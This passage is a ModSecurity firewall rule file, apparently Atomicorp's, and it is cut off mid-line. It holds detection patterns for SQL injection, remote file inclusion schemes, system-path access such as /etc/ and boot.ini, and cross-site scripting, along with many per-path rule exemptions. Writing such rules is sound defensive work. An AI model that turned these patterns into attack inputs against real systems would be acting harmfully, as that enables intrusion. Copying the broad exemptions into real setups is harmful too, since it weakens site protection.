SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:/movie/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:/descr/|!ARGS:/^sql/|!ARGS:contactMessage|!ARGS:cts|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:sql_query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/ "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*from)"   	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:340849,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection'"

SecMarker END_RULES_91568

SecRule REQUEST_FILENAME "/admin/addvideo\.php" "phase:2,id:91569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/installation/install3\.php" "phase:2,id:91570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/installation/install\.php" "phase:2,id:91571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/install/" "phase:2,id:91572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/categorie\.php" "phase:2,id:91573,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91574,t:none,pass,nolog,skipAfter:END_RULES_91574"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/iframe/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340850,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/iframe/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340851,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91574

SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/quick_reply\.php" "phase:2,id:91576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:91577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/install/" "phase:2,id:91578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/glossary\.pl" "phase:2,id:91579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin-create-edit-page\.php" "phase:2,id:91580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/question/question\.php" "phase:2,id:91581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/" "phase:2,id:91582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:91583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/adm/" "phase:2,id:91584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/typo3/" "phase:2,id:91585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/typo3/ajax\.php" "phase:2,id:91586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/setup/" "phase:2,id:91587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/portal/index\.php" "phase:2,id:91588,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
SecAction "phase:2,id:91589,t:none,pass,nolog,skipAfter:END_RULES_91589"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:/highlight/|!ARGS:name|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:340860,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}'"

SecMarker END_RULES_91589

SecRule REQUEST_FILENAME "/components/com_zoom/etc/" "phase:2,id:91590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/admin_orders\.php" "phase:2,id:91591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/setup\.jspa" "phase:2,id:91592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/pages\.php" "phase:2,id:91593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/sql\.php3" "phase:2,id:91594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/sql\.php" "phase:2,id:91595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/ipn_main_handler\.php" "phase:2,id:91596,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91597,t:none,pass,nolog,skipAfter:END_RULES_91597"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^item_name/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340870,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^item_name/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,capture,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340871,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecRule REQUEST_URI|ARGS|!ARGS:/^item_name/|!ARGS:newyddionc|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340872,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"


SecMarker END_RULES_91597

SecRule REQUEST_FILENAME "/xcloner\.php" "phase:2,id:91598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/cms/content\.php" "phase:2,id:91599,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91600,t:none,pass,nolog,skipAfter:END_RULES_91600"

SecRule ARGS|!ARGS:short|!ARGS:keywords|!ARGS:/code/|!ARGS:plaatje|!ARGS:ranking_info|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:/webcam/|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:/site/|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/webseite/|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:/web/|!ARGS:/home/|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:/img/|!ARGS:Stream|!ARGS:CP_email|!ARGS:flvsite|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:V_feed_email|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/^description/|!ARGS:notification_body|!ARGS:sitead|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:logo_path|!ARGS:prehtml_root|!ARGS:revpro_video|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/html_content/|!ARGS:desc|!ARGS:descripcion|!ARGS:body_html|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:htmlSource|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:blog|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/^commontemplate/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:return_to|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:openid_return_to|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!A